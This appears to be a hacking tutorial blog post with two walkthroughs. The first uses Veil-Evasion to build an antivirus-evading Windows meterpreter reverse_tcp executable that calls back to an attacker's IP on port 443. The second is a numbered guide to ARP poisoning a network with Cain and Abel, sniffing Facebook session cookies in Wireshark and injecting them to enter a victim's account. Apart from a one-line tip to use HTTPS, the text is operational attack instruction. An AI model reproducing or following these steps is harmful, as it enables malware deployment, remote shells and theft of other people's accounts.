BYPASSING ANTIVIRUS USING VEIL-FRAMEWORK

BYPASSING ANTIVIRUS USING VEIL-FRAMEWORK

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.
Veil-Evasion is a tool which generate payload executable that bypass common antivirus solutions by creating each payload with randomness.
Installing Veil

USING KALI OR BACKTRACK

kali download link:

• To install just type, “apt-get update && then apt-get install veil”
• To run the program open a terminal and just type, “veil-evasion”

And this will bring you to the main menu.

Then type command “list” to obtain a list of available payload:

[>] Please enter a command: use 27

[>] Please enter a command: set use_pyherion  Y

[>] Please enter a command: generate

Then wait while the shellcode is been generated.

Now we are going to select msfvenom by typing “1”

[>] Please enter the number of your choice :  1

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

 Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

 Enter value for ‘LPORT': “443”

We need to press enter and then Veil requests us the name of our payload. In this case “payload”. We can write any name depending on us.

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1”.

[>] Please enter the number of your choice :  1

And then press enter.

In the end, we can get our executable at “/root/Veil-output/compiled/

The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.

HTTP SESSION HIJACKING

• HTTP SESSION HIJACKING

  
  
• Wireshark
• Cain and Abel
• Link Cain Able 
MD5:6fd3c21ef5e301a91e44d2666d9dc90c
SHA1:6a77bb40f384cdbcdb520b0765029459add78fcf

• Mozilla Addons (Grease Monkey) 
• Mozila Addons (Cookie Injector)
• Download from Mozilla Addon Store

Procedure:

1.Install Wireshark, Cain and Abel, Grease Monkey, Cookie Injector.

2.Start Wireshark

3.Install Cain and Abel. (Note : Winpcap driver should not be installed again if intalled with wireshark else it will create issues)

4.Go to Capture -> Interfaces (Ctrl+i) . Select & Click start your interface card through which the traffic is passing.(eth0 or wlan0)


5.Start Cain and Abel

6.Click Configure > Select the interface card, click ok

7.Start the Sniffer

8.Go to Sniffers Tab

9.Click Add items to the current list.

10.Then a MAC Address scanner will come up in which select the (All the hosts in my subnet) & Click ok

11.Now you can see the IP Address and MAC Address collected in the sniffers tab.

12. Now go to APR (ARP Poison Routing)

13. Inside the ARP Poison Routing click inside the spaces (so that you can get you Add the items to the current list activated) and now click on add items to the list in which u get a New ARP Poison Routing with a list of hosts on the left side and the right side .

14. Select the Target IP Address on the left side and on selecting itself you get an option to select another IP Address (Gateway) from the right side which is ofcourse the gateway and click ok.

15. Now you are ready about to do ARP Poisoin Routing (as you can see its status is idle).Click it and start APR.

16.Now move to wireshark and start analysing the traffic, you can see the traffic coming to your computer from the target ip address .

17. If the victim is using any HTTP or login into any HTTP ,then you get his cookies.

18.In the wireshark filter section type http.cookie contains datr , datr is the value present in facebook cookies.

19. Now it will filter out all the packets containing cookie value.Right Click on it Copy> Bytes > Printable Text Only.

20.Open your Mozilla Firefox, go to website whoes cookies you stole using wireshark then use (Alt + C) .Wireshark Cookie Dump will come up and paste the contents that you have copied from the wireshark into it and click ok.

21.You can see a grease monkey alert message on clicking OK ie All Cookies have been written.

22. Now Refresh your browser.You are into his/her Account.Result : HTTP Session Hijacked by rerouting the traffic using Cain and Abel. MITM (Man in the middle Attack)

Prevention : Inorder to Prevent from this kind of attack always use HTTPS.

NOTE: any Query Or any Step not understood Do mail me....